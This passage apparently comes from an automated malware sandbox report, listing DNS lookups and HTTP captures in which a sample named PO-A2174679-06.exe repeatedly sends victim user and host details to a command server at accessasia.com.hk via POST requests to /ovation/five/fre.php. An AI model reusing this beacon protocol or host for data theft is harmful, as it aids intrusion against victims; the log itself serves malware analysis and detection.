                            Feb 23, 2021 08:49:53.589860916 CET6345853192.168.2.58.8.8.8
                            Feb 23, 2021 08:49:53.648022890 CET53634588.8.8.8192.168.2.5
                            Feb 23, 2021 08:49:54.398741961 CET5042253192.168.2.58.8.8.8
                            Feb 23, 2021 08:49:54.453586102 CET53504228.8.8.8192.168.2.5
                            Feb 23, 2021 08:49:55.252079010 CET5324753192.168.2.58.8.8.8
                            Feb 23, 2021 08:49:55.309329987 CET53532478.8.8.8192.168.2.5
                            Feb 23, 2021 08:49:56.039648056 CET5854453192.168.2.58.8.8.8
                            Feb 23, 2021 08:49:56.093118906 CET53585448.8.8.8192.168.2.5
                            Feb 23, 2021 08:49:56.871685028 CET5381453192.168.2.58.8.8.8
                            Feb 23, 2021 08:49:56.923170090 CET53538148.8.8.8192.168.2.5
                            Feb 23, 2021 08:49:57.685812950 CET5130553192.168.2.58.8.8.8
                            Feb 23, 2021 08:49:57.742845058 CET53513058.8.8.8192.168.2.5
                            Feb 23, 2021 08:49:58.478722095 CET5367053192.168.2.58.8.8.8
                            Feb 23, 2021 08:49:58.527405977 CET53536708.8.8.8192.168.2.5
                            Feb 23, 2021 08:49:59.317658901 CET5516053192.168.2.58.8.8.8
                            Feb 23, 2021 08:49:59.380300045 CET53551608.8.8.8192.168.2.5
                            Feb 23, 2021 08:50:00.153100967 CET6141453192.168.2.58.8.8.8
                            Feb 23, 2021 08:50:00.204687119 CET53614148.8.8.8192.168.2.5
                            Feb 23, 2021 08:50:00.970994949 CET6384753192.168.2.58.8.8.8
                            Feb 23, 2021 08:50:01.022571087 CET53638478.8.8.8192.168.2.5
                            Feb 23, 2021 08:50:02.258004904 CET6152353192.168.2.58.8.8.8
                            Feb 23, 2021 08:50:02.306612015 CET53615238.8.8.8192.168.2.5
                            Feb 23, 2021 08:50:04.100541115 CET5055153192.168.2.58.8.8.8
                            Feb 23, 2021 08:50:04.158838034 CET53505518.8.8.8192.168.2.5
                            Feb 23, 2021 08:50:05.398031950 CET6284753192.168.2.58.8.8.8
                            Feb 23, 2021 08:50:05.446899891 CET53628478.8.8.8192.168.2.5

                            DNS Queries

                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                            Feb 23, 2021 08:49:20.678886890 CET192.168.2.58.8.8.80xf8afStandard query (0)onedrive.live.comA (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:22.746526003 CET192.168.2.58.8.8.80x93ceStandard query (0)hrf0ga.bn.files.1drv.comA (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:24.953957081 CET192.168.2.58.8.8.80xdb4eStandard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:26.067426920 CET192.168.2.58.8.8.80xa0e7Standard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:27.139729977 CET192.168.2.58.8.8.80x6790Standard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:28.834021091 CET192.168.2.58.8.8.80xf96fStandard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:30.838077068 CET192.168.2.58.8.8.80xd073Standard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:31.702461958 CET192.168.2.58.8.8.80x33aaStandard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:32.663688898 CET192.168.2.58.8.8.80xd44cStandard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:33.527338028 CET192.168.2.58.8.8.80x22c5Standard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:34.401932001 CET192.168.2.58.8.8.80xb9caStandard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:35.281724930 CET192.168.2.58.8.8.80x6b5Standard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:36.152736902 CET192.168.2.58.8.8.80x9a3aStandard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:39.014914989 CET192.168.2.58.8.8.80x12d7Standard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:39.839940071 CET192.168.2.58.8.8.80x25e9Standard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:40.670694113 CET192.168.2.58.8.8.80x78ccStandard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:41.616817951 CET192.168.2.58.8.8.80xc62bStandard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:42.491641045 CET192.168.2.58.8.8.80x73a4Standard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:43.315052032 CET192.168.2.58.8.8.80xda20Standard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:44.121681929 CET192.168.2.58.8.8.80x3245Standard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:45.044739008 CET192.168.2.58.8.8.80x9662Standard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:46.037842035 CET192.168.2.58.8.8.80xd00Standard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:46.885462999 CET192.168.2.58.8.8.80xb63fStandard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:47.750703096 CET192.168.2.58.8.8.80x3762Standard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:48.638226032 CET192.168.2.58.8.8.80xb0d5Standard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:49.469754934 CET192.168.2.58.8.8.80xef29Standard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:50.380815983 CET192.168.2.58.8.8.80xa120Standard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:51.176249027 CET192.168.2.58.8.8.80x26d4Standard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:51.972486973 CET192.168.2.58.8.8.80x24a9Standard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:52.794002056 CET192.168.2.58.8.8.80x4bcdStandard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:53.589860916 CET192.168.2.58.8.8.80x1c9dStandard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:54.398741961 CET192.168.2.58.8.8.80x275aStandard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:55.252079010 CET192.168.2.58.8.8.80x1b29Standard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:56.039648056 CET192.168.2.58.8.8.80x5404Standard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:56.871685028 CET192.168.2.58.8.8.80xaf87Standard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:57.685812950 CET192.168.2.58.8.8.80x135bStandard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:58.478722095 CET192.168.2.58.8.8.80xeb5Standard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:59.317658901 CET192.168.2.58.8.8.80x8433Standard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:50:00.153100967 CET192.168.2.58.8.8.80xff51Standard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:50:00.970994949 CET192.168.2.58.8.8.80x7427Standard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:50:02.258004904 CET192.168.2.58.8.8.80xb8cbStandard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:50:04.100541115 CET192.168.2.58.8.8.80x4116Standard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:50:05.398031950 CET192.168.2.58.8.8.80x6758Standard query (0)accessasia.com.hkA (IP address)IN (0x0001)

                            DNS Answers

                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                            Feb 23, 2021 08:49:20.727756977 CET8.8.8.8192.168.2.50xf8afNo error (0)onedrive.live.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                            Feb 23, 2021 08:49:22.859203100 CET8.8.8.8192.168.2.50x93ceNo error (0)hrf0ga.bn.files.1drv.combn-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)
                            Feb 23, 2021 08:49:22.859203100 CET8.8.8.8192.168.2.50x93ceNo error (0)bn-files.fe.1drv.comodc-bn-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                            Feb 23, 2021 08:49:25.141832113 CET8.8.8.8192.168.2.50xdb4eNo error (0)accessasia.com.hk192.185.78.145A (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:26.124541044 CET8.8.8.8192.168.2.50xa0e7No error (0)accessasia.com.hk192.185.78.145A (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:27.337553024 CET8.8.8.8192.168.2.50x6790No error (0)accessasia.com.hk192.185.78.145A (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:29.017906904 CET8.8.8.8192.168.2.50xf96fNo error (0)accessasia.com.hk192.185.78.145A (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:30.895327091 CET8.8.8.8192.168.2.50xd073No error (0)accessasia.com.hk192.185.78.145A (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:31.759629965 CET8.8.8.8192.168.2.50x33aaNo error (0)accessasia.com.hk192.185.78.145A (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:32.725080013 CET8.8.8.8192.168.2.50xd44cNo error (0)accessasia.com.hk192.185.78.145A (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:33.584520102 CET8.8.8.8192.168.2.50x22c5No error (0)accessasia.com.hk192.185.78.145A (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:34.459041119 CET8.8.8.8192.168.2.50xb9caNo error (0)accessasia.com.hk192.185.78.145A (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:35.333215952 CET8.8.8.8192.168.2.50x6b5No error (0)accessasia.com.hk192.185.78.145A (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:36.212917089 CET8.8.8.8192.168.2.50x9a3aNo error (0)accessasia.com.hk192.185.78.145A (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:39.066433907 CET8.8.8.8192.168.2.50x12d7No error (0)accessasia.com.hk192.185.78.145A (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:39.900213003 CET8.8.8.8192.168.2.50x25e9No error (0)accessasia.com.hk192.185.78.145A (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:40.853167057 CET8.8.8.8192.168.2.50x78ccNo error (0)accessasia.com.hk192.185.78.145A (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:41.674030066 CET8.8.8.8192.168.2.50xc62bNo error (0)accessasia.com.hk192.185.78.145A (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:42.540183067 CET8.8.8.8192.168.2.50x73a4No error (0)accessasia.com.hk192.185.78.145A (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:43.366683006 CET8.8.8.8192.168.2.50xda20No error (0)accessasia.com.hk192.185.78.145A (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:44.181931973 CET8.8.8.8192.168.2.50x3245No error (0)accessasia.com.hk192.185.78.145A (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:45.108205080 CET8.8.8.8192.168.2.50x9662No error (0)accessasia.com.hk192.185.78.145A (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:46.097811937 CET8.8.8.8192.168.2.50xd00No error (0)accessasia.com.hk192.185.78.145A (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:46.942615032 CET8.8.8.8192.168.2.50xb63fNo error (0)accessasia.com.hk192.185.78.145A (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:47.807673931 CET8.8.8.8192.168.2.50x3762No error (0)accessasia.com.hk192.185.78.145A (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:48.686953068 CET8.8.8.8192.168.2.50xb0d5No error (0)accessasia.com.hk192.185.78.145A (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:49.529510021 CET8.8.8.8192.168.2.50xef29No error (0)accessasia.com.hk192.185.78.145A (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:50.429570913 CET8.8.8.8192.168.2.50xa120No error (0)accessasia.com.hk192.185.78.145A (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:51.234113932 CET8.8.8.8192.168.2.50x26d4No error (0)accessasia.com.hk192.185.78.145A (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:52.021190882 CET8.8.8.8192.168.2.50x24a9No error (0)accessasia.com.hk192.185.78.145A (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:52.850966930 CET8.8.8.8192.168.2.50x4bcdNo error (0)accessasia.com.hk192.185.78.145A (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:53.648022890 CET8.8.8.8192.168.2.50x1c9dNo error (0)accessasia.com.hk192.185.78.145A (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:54.453586102 CET8.8.8.8192.168.2.50x275aNo error (0)accessasia.com.hk192.185.78.145A (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:55.309329987 CET8.8.8.8192.168.2.50x1b29No error (0)accessasia.com.hk192.185.78.145A (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:56.093118906 CET8.8.8.8192.168.2.50x5404No error (0)accessasia.com.hk192.185.78.145A (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:56.923170090 CET8.8.8.8192.168.2.50xaf87No error (0)accessasia.com.hk192.185.78.145A (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:57.742845058 CET8.8.8.8192.168.2.50x135bNo error (0)accessasia.com.hk192.185.78.145A (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:58.527405977 CET8.8.8.8192.168.2.50xeb5No error (0)accessasia.com.hk192.185.78.145A (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:59.380300045 CET8.8.8.8192.168.2.50x8433No error (0)accessasia.com.hk192.185.78.145A (IP address)IN (0x0001)
                            Feb 23, 2021 08:50:00.204687119 CET8.8.8.8192.168.2.50xff51No error (0)accessasia.com.hk192.185.78.145A (IP address)IN (0x0001)
                            Feb 23, 2021 08:50:01.022571087 CET8.8.8.8192.168.2.50x7427No error (0)accessasia.com.hk192.185.78.145A (IP address)IN (0x0001)
                            Feb 23, 2021 08:50:02.306612015 CET8.8.8.8192.168.2.50xb8cbNo error (0)accessasia.com.hk192.185.78.145A (IP address)IN (0x0001)
                            Feb 23, 2021 08:50:04.158838034 CET8.8.8.8192.168.2.50x4116No error (0)accessasia.com.hk192.185.78.145A (IP address)IN (0x0001)
                            Feb 23, 2021 08:50:05.446899891 CET8.8.8.8192.168.2.50x6758No error (0)accessasia.com.hk192.185.78.145A (IP address)IN (0x0001)

                            HTTP Request Dependency Graph

                            • accessasia.com.hk

                            HTTP Packets

                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            0192.168.2.549732192.185.78.14580C:\Users\user\Desktop\PO-A2174679-06.exe
                            TimestampkBytes transferredDirectionData
                            Feb 23, 2021 08:49:25.317523003 CET5360OUTPOST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 192
                            Connection: close
                            Feb 23, 2021 08:49:25.483345032 CET5361OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 33 00 32 00 39 00 32 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54
                            Data Ascii: 'ckav.rualfons632922DESKTOP-716T771k08F9C4E9C79A3B52B3F739430RcHRa
                            Feb 23, 2021 08:49:25.682240009 CET5361INHTTP/1.1 404 Not Found
                            Date: Tue, 23 Feb 2021 07:49:25 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 15
                            Content-Type: text/html
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            1192.168.2.549733192.185.78.14580C:\Users\user\Desktop\PO-A2174679-06.exe
                            TimestampkBytes transferredDirectionData
                            Feb 23, 2021 08:49:26.296646118 CET5362OUTPOST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 192
                            Connection: close
                            Feb 23, 2021 08:49:26.458527088 CET5362OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 33 00 32 00 39 00 32 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54
                            Data Ascii: 'ckav.rualfons632922DESKTOP-716T771+08F9C4E9C79A3B52B3F739430yb2RR
                            Feb 23, 2021 08:49:26.654206038 CET5362INHTTP/1.1 404 Not Found
                            Date: Tue, 23 Feb 2021 07:49:26 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 15
                            Content-Type: text/html
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            10192.168.2.549743192.185.78.14580C:\Users\user\Desktop\PO-A2174679-06.exe
                            TimestampkBytes transferredDirectionData
                            Feb 23, 2021 08:49:38.359103918 CET5384OUTPOST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:38.523552895 CET5385OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 33 00 32 00 39 00 32 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54
                            Data Ascii: (ckav.rualfons632922DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                            Feb 23, 2021 08:49:38.721246004 CET5385INHTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:38 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            11192.168.2.549744192.185.78.14580C:\Users\user\Desktop\PO-A2174679-06.exe
                            TimestampkBytes transferredDirectionData
                            Feb 23, 2021 08:49:39.237473965 CET5386OUTPOST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:39.403633118 CET5386OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 33 00 32 00 39 00 32 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54
                            Data Ascii: (ckav.rualfons632922DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                            Feb 23, 2021 08:49:39.593688965 CET5387INHTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:39 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            12192.168.2.549745192.185.78.14580C:\Users\user\Desktop\PO-A2174679-06.exe
                            TimestampkBytes transferredDirectionData
                            Feb 23, 2021 08:49:40.069118023 CET5387OUTPOST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:40.235538006 CET5388OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 33 00 32 00 39 00 32 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54
                            Data Ascii: (ckav.rualfons632922DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                            Feb 23, 2021 08:49:40.433582067 CET5388INHTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:40 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            13192.168.2.549746192.185.78.14580C:\Users\user\Desktop\PO-A2174679-06.exe
                            TimestampkBytes transferredDirectionData
                            Feb 23, 2021 08:49:41.025088072 CET5389OUTPOST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:41.186913967 CET5389OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 33 00 32 00 39 00 32 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54
                            Data Ascii: (ckav.rualfons632922DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                            Feb 23, 2021 08:49:41.377275944 CET5389INHTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:41 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            14192.168.2.549747192.185.78.14580C:\Users\user\Desktop\PO-A2174679-06.exe
                            TimestampkBytes transferredDirectionData
                            Feb 23, 2021 08:49:41.847378016 CET5390OUTPOST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:42.009980917 CET5391OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 33 00 32 00 39 00 32 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54
                            Data Ascii: (ckav.rualfons632922DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                            Feb 23, 2021 08:49:42.205475092 CET5391INHTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:41 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            15192.168.2.549748192.185.78.14580C:\Users\user\Desktop\PO-A2174679-06.exe
                            TimestampkBytes transferredDirectionData
                            Feb 23, 2021 08:49:42.711982012 CET5392OUTPOST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:42.875757933 CET5392OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 33 00 32 00 39 00 32 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54
                            Data Ascii: (ckav.rualfons632922DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                            Feb 23, 2021 08:49:43.067840099 CET5392INHTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:42 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            16192.168.2.549749192.185.78.14580C:\Users\user\Desktop\PO-A2174679-06.exe
                            TimestampkBytes transferredDirectionData
                            Feb 23, 2021 08:49:43.540302992 CET5393OUTPOST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:43.704432011 CET5393OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 33 00 32 00 39 00 32 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54
                            Data Ascii: (ckav.rualfons632922DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                            Feb 23, 2021 08:49:43.895927906 CET5394INHTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:43 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            17192.168.2.549750192.185.78.14580C:\Users\user\Desktop\PO-A2174679-06.exe
                            TimestampkBytes transferredDirectionData
                            Feb 23, 2021 08:49:44.361483097 CET5395OUTPOST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:44.524343014 CET5395OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 33 00 32 00 39 00 32 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54
                            Data Ascii: (ckav.rualfons632922DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                            Feb 23, 2021 08:49:44.730729103 CET5395INHTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:44 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
